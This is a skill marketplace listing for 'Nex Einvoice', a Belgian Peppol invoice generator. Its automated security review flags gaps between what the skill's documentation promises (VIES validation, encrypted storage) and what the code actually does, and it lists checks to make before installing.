ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Nex Einvoice

v1.0.0

Generate Belgian-compliant e-invoices in the Peppol BIS 3.0 UBL format from natural language input in Dutch or English, satisfying mandatory requirements for...

1· 23·0 current·0 all-time
byNex AI@nexaiguy
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
CryptoCan make purchases
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
high confidence
!
Purpose & Capability
Name/description promise: Belgian Peppol UBL invoices, VAT validation against EU VIES, encrypted local storage. What the code shows: a CLI and library that parse natural language, produce UBL XML, and store invoices in a plain SQLite DB under ~/.nex-einvoice (config.py). There is no code that calls EU VIES in the provided files; VAT validation is implemented as a local modulo check. The claimed 'encrypted' storage is not implemented in the shown storage.py (plain SQLite). Also README and SKILL.md reference different data paths (~/.einvoice vs ~/.nex-einvoice) and list a templates/* fileset that is not present in the manifest. These mismatches indicate the metadata/marketing text is not fully aligned with the actual implementation.
!
Instruction Scope
SKILL.md instructs running setup.sh and using the nex-einvoice CLI; the runtime instructions themselves are reasonably scoped to invoicing. However the SKILL.md and README assert behaviors that the code does not implement (external VIES validation, no-telemetry, encrypted DB). The CLI and libs read and write local files, environment defaults, and create a local SQLite DB — which is consistent — but there is no evidence in the provided code of the external network VIES calls claimed in some documentation or of encryption of the DB. Verify the full setup.sh and any omitted files for network calls before trusting the 'no external API calls' claim.
Install Mechanism
This is an instruction+code bundle with no download/install spec in the registry (lowest risk). It ships source files and a setup.sh. The install mechanism is manual (run setup.sh); there are no remote installers or fetched archives in the registry metadata. Review setup.sh before running to confirm it doesn't fetch or execute remote code.
Credentials
Registry declares no required env vars; config.py does read a number of optional NEX_EINVOICE_* environment variables to prefill seller/payment defaults (expected for a CLI invoicing tool). That's proportional. Note: some seller/payment defaults are expected to contain secrets (IBAN, BIC, emails) — these are stored locally in JSON files under the data dir. The skill does not declare these as required, but they are optional inputs read from env if present.
Persistence & Privilege
always:false and the skill is user-invocable/autonomous by default (normal). The skill creates and persists its own data under a data directory; storage.py sets restrictive Unix perms on that directory where possible. It does not appear to modify other skills or system-wide settings from the shown code.
What to consider before installing
This skill appears to implement a local invoice generator and CLI, but the documentation and code disagree on several important points. Before installing or running it: 1) Inspect setup.sh (it will be executed during setup) to ensure it does not download or run remote code. 2) If you rely on EU VIES VAT validation or on encrypted storage, note that the provided code implements only a local VAT checksum and stores invoices in plain SQLite files (no DB encryption in the visible code). 3) Confirm where data will live (config.py defaults to ~/.nex-einvoice, README references ~/.einvoice — be cautious and check DATA_DIR). 4) Check for missing files (templates/* referenced in metadata is absent) and any network calls in files omitted from the excerpt. 5) If you will store sensitive payment info (IBAN) in seller/payment JSON files, ensure you trust the machine and backup/encrypt those files yourself if needed. If you want a stronger assurance the tool behaves as advertised, ask the publisher for: full contents of setup.sh and any omitted files, explicit statement (and implementation) of VAT VIES integration, and proof/implementation of on-disk encryption for the database.

Like a lobster shell, security has layers — review code before you run it.

latestvk973pxcqsf5g4s1rw6ge8d0svn8491hv

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Runtime requirements

🧾 Clawdis
Binspython3

Comments